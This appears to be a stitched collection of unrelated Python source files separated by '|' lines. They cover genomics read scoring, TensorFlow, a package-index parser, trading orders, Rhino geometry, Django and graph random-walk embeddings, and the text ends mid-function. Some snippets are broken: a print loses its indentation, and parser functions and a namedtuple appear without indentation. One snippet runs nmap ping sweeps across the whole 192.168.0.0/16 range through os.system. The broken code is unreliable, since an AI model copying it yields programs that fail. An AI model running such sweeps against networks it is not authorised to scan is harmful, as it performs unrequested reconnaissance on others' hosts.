# --full_interval: score every reference position; --around_changes: score a
# +/-20-base window spanning the first through last truly changed base.
if args.full_interval and args.around_changes:
    print("Can't use both --aroung_changes and --full_interval")
    exit(1)
if args.full_interval:
    new_interesting = [None for b in reference]
    for b in interesting:
        new_interesting[b.id] = b
    interesting = new_interesting
    for i in range(len(reference)):
        # NOTE(review): `== None` works but `is None` is the Python idiom.
        if interesting[i] == None:
            interesting[i] = interesting_base(i, reference)
elif args.around_changes:
    changed = list(filter(lambda b: b.real_value != b.reference_value, interesting))
    # min()/max() compare interesting_base objects directly -- presumably
    # they order by position; TODO confirm their comparison semantics.
    begin = max(0, min(changed).id - 20)
    end = min(len(reference), max(changed).id + 1 + 20)
    interesting = [None for i in range(begin, end)]
    for b in changed:
        interesting[b.id - begin] = b
    for i in range(begin, end):
        if interesting[i - begin] == None:
            interesting[i - begin] = interesting_base(i, reference)
# Collect regular files under the read directory, keeping only *.fast5.
read_files = [os.path.join(args.read_basedir, file) for file in os.listdir(args.read_basedir) if not os.path.isdir(os.path.join(args.read_basedir, file))]
read_files = filter(lambda x : x[-6:] == ".fast5", read_files)
# Truncate the output files so later appends start from empty files.
if args.output:
    open(args.output, "w").close()
if args.log_output:
    open(args.log_output, "w").close()
# Load each read, align/normalize it against the reference, and fold its
# signal evidence into the per-base probabilities.
reads = []
for read_file in read_files:
    try:
        read = load_read(read_file, kmer_model, args.group_name)
    except KeyError:
        # Missing basecall/resquiggle group inside the fast5 -- skip it.
        print('failed to process read {}'.format(read_file))
        continue
    read.fix_start_in_reference(reference)
    if config['tweak_normalization']:
        # Re-normalize against the strand-appropriate reference sequence.
        if read.strand == '-':
            read.tweak_normalization(reverse_complement(reference), kmer_model)
        else:
            read.tweak_normalization(reference, kmer_model)
    print("[{}, {}){}".format(read.start_in_reference, read.end_in_reference, read.strand))
    model.update_probabilities_full(reference, read, interesting)
    reads.append(read)
    if args.independent:
        # Per-read mode: append this read's scores to the output files, then
        # reset the accumulators so every read is evaluated on its own.
        if args.output:
            with open(args.output, "a") as f:
                for base in interesting:
                    base.output(f)
        if args.log_output:
            with open(args.log_output, "a") as f:
                for base in interesting:
                    base.log_output(f)
        for base in interesting:
            base.clear_probabilities()
# Joint mode: print every base whose real value differs from the reference.
if not args.independent:
    for base in interesting:
        if base.real_value != base.reference_value:
            base.print()
    print()
# Plot P(reference base is wrong) along the scored interval; true changes are
# highlighted in green and a slider pans a 100-base viewing window.
if args.full_interval or args.around_changes:
    x, prob, conf, maxconf = [], [], [], []
    for b in interesting:
        probs = b.get_normalized_probability()
        prob.append(1 - probs[inv_alphabet[b.reference_value]])
        conf.append(b.log_probability[inv_alphabet[b.reference_value]])
        maxconf.append(max(b.log_probability))
        x.append(b.id)
    fig, ax = plt.subplots()
    plt.subplots_adjust(bottom=0.25)
    plt.plot(x, prob)
    #pl2 = plt.twinx()
    #pl2.plot(x, conf)
    #pl2.plot(x, maxconf, color = 'red')
    for b in interesting:
        if b.real_value != b.reference_value:
            plt.axvspan(b.id-0.5, b.id+0.5, color='green', alpha=0.5)
    from matplotlib.widgets import Slider
    axcolor = 'lightgoldenrodyellow'
    axpos = plt.axes([0.2, 0.1, 0.65, 0.03], facecolor=axcolor)
    spos = Slider(axpos, 'Pos', x[0], x[-1] - 100 + 1)
    def update(val):
        # Pan the main axes to a 100-base window starting at the slider value.
        pos = val
        ax.axis([pos, pos + 100, 0, 1])
        fig.canvas.draw_idle()
    spos.on_changed(update)
    plt.show()
# Report (and optionally visualize) the positions the model is least sure of:
# sort by 1 - P(real base) descending and print the top N.
if args.print_worst:
    by_SNP_prob = []
    for base in interesting:
        probs = base.get_normalized_probability()
        by_SNP_prob.append((1 - probs[inv_alphabet[base.real_value]], base))
    by_SNP_prob.sort(reverse=True)
    for p, base in by_SNP_prob[:int(args.print_worst)]:
        base.print()
    if args.show_worst:
        for p, base in by_SNP_prob[:int(args.show_worst)]:
            for read in reads:
                model.show_base(reference, read, base)
# Final write of the accumulated probabilities.
# NOTE(review): in --independent mode these files were appended per read and
# the probabilities cleared; rewriting with "w" here would clobber that data
# -- confirm the intended interaction of -i with -o/-l.
if args.output:
    with open(args.output, "w") as f:
        for base in interesting:
            base.output(f)
if args.log_output:
    with open(args.log_output, "w") as f:
        for base in interesting:
            base.log_output(f)
|
import tensorflow as tf

# Define a variable (a mutable counter) with an explicit graph name.
state = tf.Variable(25, name='counter')
# Define a constant.
# BUG FIX: `tf.content` does not exist in the TensorFlow API -- the intended
# call is `tf.constant`.
one = tf.constant(30)
# Graph op computing state + one (evaluated inside the session).
new_value = tf.add(state, one)
# Define the assignment op writing the sum back into the variable.
update = tf.assign(state, new_value)
# Variables must be initialized before use (TF 1.x graph mode).
init = tf.global_variables_initializer()
with tf.Session() as sess:
    sess.run(init)
    print(sess.run(update))  # 25 + 30 -> prints 55
|
def str2bool(v):
    """Return True iff *v* equals "true", compared case-insensitively."""
    return "true" == v.lower()
|
"""
문제
N을 입력받은 뒤, 구구단 N단을 출력하는 프로그램을 작성하시오. 출력 형식에 맞춰서 출력하면 된다.
입력
첫째 줄에 N이 주어진다. N은 1보다 크거나 같고, 9보다 작거나 같다.
출력
출력형식과 같게 N*1부터 N*9까지 출력한다.
예제 입력 1
2
예제 출력 1
2 * 1 = 2
2 * 2 = 4
2 * 3 = 6
2 * 4 = 8
2 * 5 = 10
2 * 6 = 12
2 * 7 = 14
2 * 8 = 16
2 * 9 = 18
"""
N=int(input())
for i in range(1,10):
print("%d * %d = %d"%(N,i,N*i)) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import collections
import os
import sys
import re
import html5lib
import packaging.specifiers
import packaging.version
import six
from .endpoints import Endpoint
from .utils import (
WHEEL_EXTENSION, WHEEL_FILENAME_RE,
match_egg_info_version, package_names_match, split_entry_ext,
)
# Taken from distlib.compat (to match pip's implementation).
# Python < 3.4 has no html.unescape; fall back to HTMLParser().unescape.
if sys.version_info < (3, 4):
    unescape = six.moves.html_parser.HTMLParser().unescape
else:
    from html import unescape
# These parsing helpers are bits and pieces collected from pip's HTMLPage
# and Link implementation.
def _parse_base_url(document, transport_url):
bases = [
x for x in document.findall(".//base")
if x.get("href") is not None
]
if not bases:
return transport_url
parsed_url = bases[0].get("href")
if parsed_url:
return parsed_url
return transport_url
def _parse_version(filename, package_name):
    """Extract the version from a distribution *filename*.

    Wheels are parsed with WHEEL_FILENAME_RE and must match *package_name*;
    anything else goes through match_egg_info_version.  Raises ValueError
    for unrecognizable or mismatched filenames.

    Fix: corrected the "invald" typo in two error messages.
    """
    stem, ext = split_entry_ext(filename)
    if ext == WHEEL_EXTENSION:
        match = WHEEL_FILENAME_RE.match(filename)
        if not match:
            raise ValueError("invalid wheel name {0!r}".format(filename))
        wheel_name, vers = match.group("name", "ver")
        if not package_names_match(package_name, wheel_name):
            raise ValueError("invalid wheel {0!r} for package {1!r}".format(
                filename, package_name,
            ))
    else:
        vers = match_egg_info_version(stem, package_name)
        if vers is None:
            raise ValueError("invalid filename {0!r}".format(filename))
    return packaging.version.parse(vers)
# Characters that must be percent-encoded when cleaning scraped URLs.
CLEAN_URL_RE = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.IGNORECASE)
# "<algorithm>=<hexdigest>" pairs carried in a URL fragment.
HASH_RE = re.compile(r'(sha1|sha224|sha384|sha256|sha512|md5)=([a-f0-9]+)')
def _iter_entries(document, base_url, package_name):
    # Yield an Entry for each parsable <a> link on a simple-index page.
    for anchor in document.findall(".//a"):
        href = anchor.get("href")
        if not href:
            continue
        try:
            # The anchor text is expected to be the distribution filename.
            version = _parse_version(anchor.text, package_name)
        except ValueError:
            # Not a recognizable sdist/wheel filename -- skip this link.
            continue
        # Percent-encode unsafe characters in the joined URL.
        # NOTE(review): "{:2x}" space-pads codepoints < 0x10 (e.g. "% a"),
        # which is not a valid percent escape; pip's HTMLPage has the same
        # quirk -- confirm this is intentional before changing it.
        url = CLEAN_URL_RE.sub(
            lambda match: "%{:2x}".format(ord(match.group(0))),
            six.moves.urllib_parse.urljoin(base_url, href),
        )
        split_result = six.moves.urllib_parse.urlsplit(url)
        # Fragments look like "#sha256=<hexdigest>".
        hashes = dict(
            match.group(1, 2)
            for match in HASH_RE.finditer(split_result.fragment)
        )
        endpoint = Endpoint.from_url(split_result)
        # PEP 503 data attributes (HTML-escaped in the page source).
        requires_python = packaging.specifiers.SpecifierSet(
            unescape(anchor.get("data-requires-python", "")),
        )
        gpg_sig = unescape(anchor.get("data-gpg-sig", ""))
        yield Entry(
            package_name, version, endpoint,
            hashes, requires_python, gpg_sig,
        )
# A downloadable thing in a repository: an anchor tag on an HTML index page,
# or a file in a directory.
Entry = collections.namedtuple("Entry", [
    "name",             # Name of the project. Not necessarily canonical?
    "version",          # packaging.version._BaseVersion.
    "endpoint",         # Endpoint to get the file.
    "hashes",           # Mapping of hashes, {hashname: hexdigest}.
    "requires_python",  # packaging.specifiers.SpecifierSet.
    "gpg_sig",          # str, maybe empty.
])

# BUG FIX: this docstring used to be a bare string expression *after* the
# assignment -- a no-op statement documenting nothing. Attach it to the type.
Entry.__doc__ = """A downloadable thing in a repository.

This would be an anchor tag in an HTML file, or a file in a directory.
"""
def parse_from_html(html, page_url, package_name):
    """Parse entries from HTML source.

    *html* must be valid HTML 5 content: either text, or a 2-tuple of
    (binary content, transport encoding) where the encoding may be None and
    is handed to html5lib to help guess the document's encoding.
    *package_name* is the name of the package listed on this page.
    """
    parse_kwargs = {"namespaceHTMLElements": False}
    if isinstance(html, six.string_types):
        content = html
    else:
        content, parse_kwargs["transport_encoding"] = html
    document = html5lib.parse(content, **parse_kwargs)
    resolved_base = _parse_base_url(document, page_url)
    return list(_iter_entries(document, resolved_base, package_name))
def _entry_from_path(path, package_name):
    """Build an Entry for a local file, or None if its name is unparsable."""
    filename = os.path.basename(path)
    try:
        parsed_version = _parse_version(filename, package_name)
    except ValueError:
        return None
    return Entry(package_name, parsed_version, Endpoint(True, path), {}, None, None)
def list_from_paths(paths, root, package_name):
    """Parse entries from a file listing.

    *paths* is a sequence of paths (e.g. from os.listdir()), absolute or
    relative to *root*; unparsable filenames are silently skipped.
    """
    entries = []
    for path in paths:
        entry = _entry_from_path(os.path.join(root, path), package_name)
        if entry is not None:
            entries.append(entry)
    return entries
|
class Sound():
    """Plain data holder for a geotagged sound recording.

    Fixes: the docstring was a copy-paste leftover ("docstring for
    Template"); removed the un-Pythonic trailing semicolons. Defaults are
    unchanged.
    """

    def __init__(self):
        self.sound_id = 0      # numeric identifier of the sound
        self.user_id = ''      # identifier of the owning user
        self.longitude = 0     # recording location, degrees
        self.latitude = 0      # recording location, degrees
        self.description = ''  # free-text description
        self.tag = ''          # free-text tag/category
class User():
    """Plain data holder for a user profile.

    Fix: removed the un-Pythonic trailing semicolons and added docs;
    defaults are unchanged.
    """

    def __init__(self):
        self.user_id = ''   # unique user identifier
        self.name = ''      # display name
        self.photo_id = ''  # id of the profile photo resource
        self.voice_id = ''  # id of the profile voice resource
|
import os

# Ping-sweep (-sn) every /24 subnet in 192.168.0.0/16 with nmap.
# NOTE(review): range(0, 255) stops at i == 254, so 192.168.255.0-254 is
# never scanned -- confirm whether that last subnet was meant to be included.
# SECURITY NOTE: os.system with a concatenated string is shell-injection
# prone in general; safe here only because `i` is a loop integer.
for i in range(0,255):
    add = "192.168."+str(i)+".0-254"
    os.system("nmap -sn "+add)
|
__author__ = 'm&g'
import sys
from zipline.api import (
order_target,
order_target_percent,
symbol,
option_symbol,
)
from zipline.assets import (
Equity,
Option,
)
from backtester.models.order import (
PlainOrderModel,
PercentOrderModel,
)
class BaseOrderExecutorModel(object):
    """Executes a batch of order models (i.e. trades) via the zipline API.

    Parameters
    ----------
    orders : iterable of order models
        Each item should be a PlainOrderModel or PercentOrderModel.

    Fixes: replaced the Python 2 `print` statement with a py2/py3-compatible
    call, and narrowed the bare `except:` (which also swallowed
    KeyboardInterrupt/SystemExit) to `except Exception`.
    """

    def __init__(self, orders):
        self.orders = orders       # order models to execute
        self._order_func = None    # zipline order function chosen per order
        self.success = False       # True only after a fully successful run

    def process_orders(self):
        """Execute the orders.

        Returns
        -------
        bool
            True when every order executed; on failure the exception is
            logged, ``success`` is set to False and the error re-raised.
        """
        try:
            for order in self.orders:
                # Pick the zipline order function matching the order model.
                if isinstance(order, PlainOrderModel):
                    self._order_func = order_target
                elif isinstance(order, PercentOrderModel):
                    self._order_func = order_target_percent
                # Pick the symbol resolver matching the security type.
                if isinstance(order.security_type, Option):
                    _symbol_func = option_symbol
                elif isinstance(order.security_type, Equity):
                    _symbol_func = symbol
                self._order_func(_symbol_func(order.symbol), order.quantity)
        except Exception:
            print("Unexpected error while processing orders: {0}".format(sys.exc_info()[0]))
            self.success = False
            raise
        else:
            self.success = True
            return self.success
|
#!/usr/bin/python3
from models.state import State
from tests.test_models.test_base_model import TestBaseModel
class TestState(TestBaseModel):
    '''
    =========================
    State tests
    =========================
    (Fix: the banner previously said "User tests" -- a copy-paste leftover.)
    '''

    def __init__(self, *args, **kwargs):
        '''
        Constructor: point the shared base-model tests at the State class.
        '''
        super().__init__(*args, **kwargs)
        self.test_class = State
        self.test_name = "State"

    def test_state_id(self):
        '''
        Attribute test: State.name must default to a string.
        '''
        state = self.test_class()
        self.assertIsInstance(state.name, str)
|
from scraper.spiders.auto_spider import CarSpider
from scrapy.settings import Settings
from scrapy.crawler import CrawlerProcess
# Run the car spider once; report and shut down on any error.
try:
    settings = Settings()
    settings.setmodule('scraper.settings')
    process = CrawlerProcess(settings=settings)
    process.crawl(CarSpider)
    process.start()
except Exception as e:
    print(f'Closed by {e}')
    # NOTE(review): Spider.close is normally invoked with a spider *instance*
    # as its first argument; calling it on the class with only `reason` looks
    # wrong -- confirm against scrapy's Spider.close signature.
    CarSpider.close(reason=e)
|
import rhinoscriptsyntax as rs

# Tunable shape parameters (original comments were romanized Japanese):
a = 0.06 # "kukan no futosa" -- parameter offset around each division point (slit half-width)
b = 0.5 # "haji no futosa" -- trim margin at the curve ends
b0 = 1.5 # "mannaka no hutosa" -- multiplier giving the larger middle margin
c = 0.2 # "chotto sita zure" -- small offset pulling one hole corner inward
def periods_ofcurve( curve, n ):
    # Sample 2*(n+1) points on `curve`: for each of n+1 evenly spaced
    # parameters, one point slightly before (d-a) and one slightly after
    # (d+a) the division point.
    domain = rs.CurveDomain( curve )
    cpoint_list = [ ]
    point0 = rs.EvaluateCurve( curve , domain[0] )
    point1 = rs.EvaluateCurve( curve , domain[1] )
    #rs.AddPoints( [ point0, point1 ] )
    for i in range(n+1):
        # NOTE(review): assumes the domain starts at 0 (uses domain[1]*i/n
        # rather than domain[0] + span*i/n) -- confirm for re-parameterized
        # curves.
        d = domain[1] * ( i )/ n
        point_lower = rs.EvaluateCurve( curve , d-a )
        point_upper = rs.EvaluateCurve( curve , d+a )
        cpoint_list.append( point_lower )
        cpoint_list.append( point_upper )
    return cpoint_list
def draw_grid( curve0 ,curve1, n ):
    # Connect matching sample points of the two rail curves with short
    # cross-curves; returns [curves_upper, curves_lower].
    d0 = periods_ofcurve( curve0, n )
    d1 = periods_ofcurve( curve1, n )
    curves_upper = []
    curves_lower = []
    for i in range(n+1):
        point00 = d0[ 2*i + 1 ]
        point01 = d0[ 2*i + 0 ]
        point10 = d1[ 2*i + 1 ]
        point11 = d1[ 2*i + 0 ]
        if i==0:
            # First division: only the upper connector is drawn.
            curve_upper = rs.AddCurve([point00, point10])
            #rs.AddCurve([point01, point11])
            curves_upper.append(curve_upper)
        elif i==n:
            # Last division: only the lower connector is drawn.
            #rs.AddCurve([point00, point10])
            curve_lower = rs.AddCurve([point11, point01])
            curves_lower.append(curve_lower)
        else:
            curve_upper = rs.AddCurve([point00, point10])
            curve_lower = rs.AddCurve([point11, point01])
            curves_upper.append(curve_upper)
            curves_lower.append(curve_lower)
    curves_all = [ curves_upper, curves_lower ]
    return curves_all
def draw_hole( grid00, grid01 ):
    # Carve one slot between two neighboring grid curves: connect key points,
    # then trim both grid curves and the connector to leave an opening.
    grids = [ grid00, grid01 ]
    points = []
    lists = []
    for i in grids:
        domain = rs.CurveDomain(i)
        # Three key parameters per grid curve: near start, near middle, near
        # end (margins controlled by the module-level b and b0).
        domains = [ domain[0]+b, domain[1]-b0*b, domain[1]-b ]
        lists.append( domains )
        for ii in domains:
            point = rs.EvaluateCurve( i, ii )
            points.append( point )
    for i in range(2):
        grid = rs.AddCurve( [ points[i*3], points[5-i*3] ] )
        domain0 = rs.CurveDomain( grid )
        # Pull the connector's far corner inward by c before joining.
        domain1 = domain0[1] - c
        point = rs.EvaluateCurve( grid, domain1 )
        #rs.AddPoint(point)
        rs.AddCurve( [ point, points[i*3+1] ] )
        rs.TrimCurve( grids[i], ( lists[i][0], lists[i][1] ) )
        rs.TrimCurve( grid, ( domain0[0], domain1 ) )
def draw_holes( curve0, curve1, n):
    # Build the grid between the two rails, then carve a hole in each cell.
    grids = draw_grid( curve0, curve1, n )
    for i in range(n):
        draw_hole( grids[0][i], grids[1][i] )
def draw_severaltimes( n ):
    # Interactive loop: keep asking for rail-curve pairs and carving holes
    # until the user clicks the red exit circle.
    x = 1
    circle = rs.AddCircle( ( 0, 0, 0 ), 10 )
    rs.ObjectColor( circle, ( 255, 0, 0 ), )
    while x == 1:
        curve0 = rs.GetObject("Select a curve(If you want program to finish, click red circle) ")
        if curve0 == circle:
            rs.DeleteObject( circle )
            break
        else:
            curve1 = rs.GetObject("Select a curve")
            draw_holes( curve0, curve1, n )

# Entry point: run the interactive tool with 15 divisions per rail pair.
draw_severaltimes(15)
from cl_app.utils import general_error_response
from .models import(Employee, Fmspw)
from rest_framework.authtoken.models import Token
from django.contrib.auth.models import User
from rest_framework.response import Response
from rest_framework import status
# log start
# import logging
# logging.basicConfig(filename='tokcron.log',level=logging.INFO)
# def token_create_job():
# try:
# print("kkk")
# token = Token.objects.filter().delete()
# fmspw_ids = Fmspw.objects.filter(pw_isactive=True,user__is_active=True)
# for f in fmspw_ids:
# if f.user:
# token_cr = Token.objects.create(user = f.user)
# result = {'status': status.HTTP_200_OK,"message":"Token Cron Successful",'error': False}
# return Response(result,status=status.HTTP_200_OK)
# except Exception as e:
# invalid_message = str(e)
# return general_error_response(invalid_message)
|
class Solution:
    def removeKdigits(self, num, k):
        """
        Remove k digits from num so the remaining number is smallest
        (monotonic-stack greedy).
        :type num: str
        :type k: int
        :rtype: str
        """
        # Removing every digit leaves zero.
        if k == len(num):
            return '0'
        kept = []
        remaining = k
        for digit in num:
            # Evict larger digits from the tail while removals remain.
            while kept and remaining and digit < kept[-1]:
                kept.pop()
                remaining -= 1
            kept.append(digit)
        # Digits are now non-decreasing; drop any leftover removals from the end.
        if remaining:
            kept = kept[:-remaining]
        # int() strips leading zeros; str() restores the required type.
        return str(int(''.join(kept)))
# Ad-hoc smoke tests -- expected output: "11", "1219", "0".
print(Solution().removeKdigits("112", 1))
print(Solution().removeKdigits("1432219",3))
print(Solution().removeKdigits("1",1))
|
# Greet each user; the admin gets a special status-report prompt.
names = ['admin', 'panda', 'tiger', 'dog', 'cat']
for user in names:
    greeting = (
        "Hello admin, would you like to see a status report."
        if user == 'admin'
        else "Hello " + user + ", thank you for logging in again."
    )
    print(greeting)
from django.db import models

# Create your models here.
class jrny(models.Model):
    """A journey record: start/destination, time string, a number and a date.

    NOTE(review): the class name breaks PascalCase, and time/date are stored
    as CharFields rather than Time/DateField -- renaming or retyping would
    require a Django migration, so both are left as is.
    """
    start = models.CharField(max_length=100)
    destination = models.CharField(max_length=100)
    time = models.CharField(max_length=12)
    number = models.IntegerField()
    date = models.CharField(max_length=12)

    def __str__(self):
        # Admin/list display: show the journey's starting point.
        return self.start
|
import networkx as nx
import numpy as np
from constants import *
from fastdtw import fastdtw
from utils import dist, compressed_degree_list, avg_2d_array
from utils import neg_softmax
class RandomWalkerFactory:
    """Factory mapping a strategy name to a configured RandomWalker."""

    @staticmethod
    def get_random_walker(name, options):
        """Return a walker for *name* ('node2vec' | 'struc2vec' | 'edge2vec')
        configured from the *options* dict, or None for an unknown name.

        Bug fix: this was written as an instance method without `self`, so it
        only worked when (accidentally) called on the class itself;
        @staticmethod makes both Class.method() and instance.method() valid.
        """
        if name == 'node2vec':
            assert 'p' in options and 'q' in options, 'Must specify both p and q.'
            return Node2VecWalker(p=options['p'], q=options['q'])
        if name == 'struc2vec':
            assert 'q' in options
            # Optional limits default to -1 (unlimited / auto-sized).
            k_max = options['k_max'] if 'k_max' in options else -1
            n_comparisons = options['n_comparisons'] if 'n_comparisons' in options else -1
            return Struc2VecWalker(q=options['q'], k_max=k_max, n_comp=n_comparisons)
        if name == 'edge2vec':
            assert 'q' in options
            field = options['field'] if 'field' in options else 'weight'
            return Edge2VecWalker(q=options['q'], field=field)
        return None
class RandomWalker:
    """Abstract base class: concrete walkers generate random walks on a graph."""

    def generate_walks(self, graph, walk_length, num_walks):
        """Produce `num_walks` walks of `walk_length` steps; must be overridden."""
        raise NotImplementedError()
class Node2VecWalker(RandomWalker):
    """Biased second-order random walks (node2vec).

    p: return parameter -- larger p discourages stepping back to the
       previous node.
    q: in-out parameter -- larger q keeps the walk close to its start
       (BFS-like); smaller q encourages exploration (DFS-like).
    """

    def __init__(self, p, q):
        super(Node2VecWalker, self).__init__()
        self.p = p
        self.q = q

    def generate_walks(self, graph, walk_length, num_walks):
        walks = []
        for _ in range(num_walks):
            for node in graph.nodes():
                # t is the previously visited node, v the current one.
                t = node
                v = node
                walk = []
                while len(walk) < walk_length:
                    walk.append(v)
                    # Compute weights for each neighbor x of v
                    neighbor_weights = []
                    for x in graph.neighbors(v):
                        weight = 1.0
                        if x == t:
                            # Returning to the previous node: factor 1/p.
                            weight *= (1.0 / self.p)
                        elif t in graph[x] or x in graph[t]:
                            # x is adjacent to the previous node: unbiased.
                            weight *= 1.0
                        else:
                            # Stepping outward from t: factor 1/q.
                            weight *= (1.0 / self.q)
                        neighbor_weights.append(weight)
                    # Normalize the weights
                    s = np.sum(neighbor_weights) + SMALL_NUMBER
                    neighbor_weights = np.array(neighbor_weights) / s
                    # Move the previous pointer to the current node after the first iteration
                    if len(walk) > 0:
                        t = v
                    # Select the next node
                    # NOTE(review): if the normalized weights do not sum to
                    # ~1 (e.g. v has no neighbors), v is left unchanged and
                    # the walk repeats v until walk_length -- confirm this
                    # fallback is intended.
                    if abs(1.0 - np.sum(neighbor_weights)) < 1e-3:
                        v = np.random.choice(list(graph.neighbors(v)), p=neighbor_weights)
                walks.append(walk)
        return np.array(walks)
class Struc2VecWalker(RandomWalker):
    """Structural-similarity random walks (struc2vec).

    q:      probability of staying in the current layer and stepping to a
            structurally similar node (vs. switching layers).
    k_max:  maximum layer index, or -1 for no limit.
    n_comp: nodes compared per degree cluster, or -1 to auto-size to ~log(n).
    """

    def __init__(self, q, k_max, n_comp):
        super(Struc2VecWalker, self).__init__()
        self.q = q
        self.k_max = k_max
        self.num_comparisons = n_comp

    def generate_walks(self, graph, walk_length, num_walks):
        # Dictionary mapping each vertex to a list of vertices which have
        # similar degrees
        degree_clusters = self._create_degree_clusters(graph)
        # Vertices which are direct neighbors of each node
        neighborhoods = {
            node: {0: set([node])} for node in graph.nodes()
        }
        # Create degree lists for the 0th level
        degree_neighborhoods = {node: {} for node in graph.nodes()}
        self._add_kth_degree_neighborhood(graph, degree_neighborhoods, neighborhoods, 0)
        # Initialize 0th level distances and weights
        l0_dist = self._compute_distances(graph, degree_neighborhoods, degree_clusters, 0, None)
        distances = [l0_dist]
        l0_weights = self._compute_weights(graph, l0_dist)
        weights = [l0_weights]
        avg_weights = [avg_2d_array(l0_weights)]
        walks = []
        for _ in range(num_walks):
            for node in graph.nodes():
                walk = [node]
                k = 0
                u = node
                while len(walk) < walk_length:
                    # With probability q: step within the current layer.
                    should_stay = np.random.random() < self.q
                    if should_stay:
                        u = np.random.choice(degree_clusters[u], p=weights[k][u])
                        walk.append(u)
                    else:
                        # Otherwise switch layers (up with probability
                        # log(gamma + e) / (log(gamma + e) + 1), where gamma
                        # counts above-average edge weights at this layer).
                        if k == 0:
                            k += 1
                        elif self.k_max != -1 and k == self.k_max:
                            k -= 1
                        else:
                            gamma = np.sum([int(weights[k][u][v] > avg_weights[k]) \
                                for v,_ in enumerate(degree_clusters[u])])
                            up_weight = np.log(gamma + np.e)
                            down_weight = 1.0
                            up_prob = up_weight / (up_weight + down_weight)
                            should_move_up = np.random.random() < up_prob
                            if should_move_up:
                                k += 1
                            else:
                                k -= 1
                        # Only compute a layer's weights when the layer is reached
                        if len(weights) <= k:
                            self._add_kth_neighborhood(graph, neighborhoods, k)
                            self._add_kth_degree_neighborhood(graph, degree_neighborhoods, neighborhoods, k)
                            lk_dist = self._compute_distances(graph, degree_neighborhoods,
                                degree_clusters, k, distances[k-1])
                            lk_weights = self._compute_weights(graph, lk_dist)
                            distances.append(lk_dist)
                            weights.append(lk_weights)
                            avg_weights.append(avg_2d_array(lk_weights))
                walks.append(walk)
        return np.array(walks)

    def _add_kth_neighborhood(self, graph, neighborhoods, k):
        # Level k = level k-1 plus every direct neighbor of its members.
        for node in graph.nodes():
            prev = neighborhoods[node][k-1]
            neighbors = prev.copy()
            for n in prev:
                neighbors.update(set(graph.neighbors(n)))
            neighborhoods[node][k] = neighbors

    def _add_kth_degree_neighborhood(self, graph, degree_neighborhoods, neighborhoods, k):
        # Compressed degree sequence of each node's level-k neighborhood.
        for node in graph.nodes():
            degree_neighborhoods[node][k] = compressed_degree_list(graph, neighborhoods[node][k])
        return degree_neighborhoods

    def _compute_distances(self, graph, degree_neighborhoods, degree_clusters, k, prev_layer_distances):
        # Structural distance from every node to each node in its cluster.
        distances = []
        for u in graph.nodes():
            d = [self._compute_distance(u, v, i, degree_neighborhoods, k, prev_layer_distances) \
                for i, v in enumerate(degree_clusters[u])]
            distances.append(d)
        return np.array(distances)

    def _compute_distance(self, u, v, v_index, degree_neighborhoods, k, prev_layer_distances):
        # f_k(u, v): DTW distance between level-k degree lists, accumulated
        # on top of the previous layer's distance.
        if u == v:
            return 0.0
        distance, _ = fastdtw(degree_neighborhoods[u][k], degree_neighborhoods[v][k], dist=dist)
        f_k = prev_layer_distances[u][v_index] + distance if prev_layer_distances is not None else distance
        return f_k

    def _compute_weights(self, graph, distances):
        return [self._compute_weight(distances, n) for n in graph.nodes()]

    def _compute_weight(self, distances, u):
        # Softmax-style weights: exp(-distance), normalized over the cluster.
        distances = np.array(distances[u])
        weights = np.exp(-distances)
        s = np.sum(weights)
        weights = weights / s
        return np.array(weights)

    def _create_degree_clusters(self, graph):
        # For each node, the nodes nearest to it in sorted-degree order
        # (cluster size = n_comp, or ~log(n) when auto-sized).
        degrees = [graph.degree(n) for n in graph.nodes()]
        sorted_nodes = [n for _, n in sorted(zip(degrees, list(graph.nodes())))]
        degree_clusters = {}
        # Determine the size of cluster for each node
        cluster_size = self.num_comparisons
        if cluster_size == -1:
            cluster_size = int(np.log(graph.number_of_nodes())) + 1
        for i, n in enumerate(sorted_nodes):
            if i < cluster_size:
                cluster = sorted_nodes[0:cluster_size+i]
            elif i >= len(sorted_nodes) - cluster_size:
                cluster = sorted_nodes[i-cluster_size:]
            else:
                cluster = sorted_nodes[i-cluster_size:i+cluster_size]
            # Slices copy, so removing n does not mutate sorted_nodes.
            cluster.remove(n)
            degree_clusters[n] = cluster
        return degree_clusters
class Edge2VecWalker(RandomWalker):
    """Struc2vec-style hierarchical random walks over *edges* instead of nodes.

    q:     probability of staying in the current layer and stepping to a
           structurally similar edge (vs. switching layers).
    field: edge-attribute name read as the weight feature.
    """

    def __init__(self, q, field):
        super(Edge2VecWalker, self).__init__()
        self.q = q
        self.field = field

    def generate_walks(self, graph, walk_length, num_walks):
        """Generate `num_walks` walks of `walk_length` edges starting from each edge."""
        clusters = self._create_clusters(graph)
        # Layer 0 is precomputed; deeper layers are built lazily below.
        neighborhoods = [self._create_neighborhoods(graph, prev_level=None)]
        edge_features = self._get_edge_features(graph)
        distances = [self._compute_distances(graph, clusters, neighborhoods[0], edge_features, None)]
        walks = []
        for _ in range(num_walks):
            for edge in graph.edges():
                walk = [edge]
                k = 0
                e = edge
                while len(walk) < walk_length:
                    should_stay = np.random.random() < self.q
                    if not should_stay:
                        # Switch layers: up or down with equal probability
                        # (always up from layer 0).
                        should_move_up = np.random.random() < 0.5
                        if should_move_up or k == 0:
                            k += 1
                        else:
                            k -= 1
                        # BUG FIX: this condition was `len(neighborhoods) >= k`,
                        # which recomputed and re-appended already-built layers
                        # on every switch, corrupting the per-layer lists and
                        # growing them without bound. Build a layer only when
                        # it does not exist yet, mirroring Struc2VecWalker's
                        # `len(weights) <= k` check.
                        if len(neighborhoods) <= k:
                            kth_neighborhood = self._create_neighborhoods(graph, neighborhoods[k-1])
                            neighborhoods.append(kth_neighborhood)
                            kth_distances = self._compute_distances(graph=graph,
                                clusters=clusters,
                                neighborhoods=kth_neighborhood,
                                features=edge_features,
                                prev_layer_distances=distances[k-1])
                            distances.append(kth_distances)
                    else:
                        # Step to a similar edge; small distances get large weights.
                        weights = neg_softmax(distances[k][e])
                        next_edge_index = np.random.choice(len(clusters[e]), p=weights)
                        e = clusters[e][next_edge_index]
                        walk.append(e)
                walks.append(walk)
        return walks

    def _create_clusters(self, graph):
        # Every edge is compared against every other edge.
        clusters = {}
        edge_list = list(graph.edges())
        for e in graph.edges():
            clusters[e] = edge_list
        return clusters

    def _create_neighborhoods(self, graph, prev_level):
        # Expand each edge's neighborhood one hop beyond the previous level.
        neighborhoods = {}
        for e in graph.edges():
            prev = prev_level[e] if prev_level is not None else [e]
            neighborhood = set()
            for src, dest in prev:
                for n in graph.neighbors(src):
                    neighborhood.add((src, n))
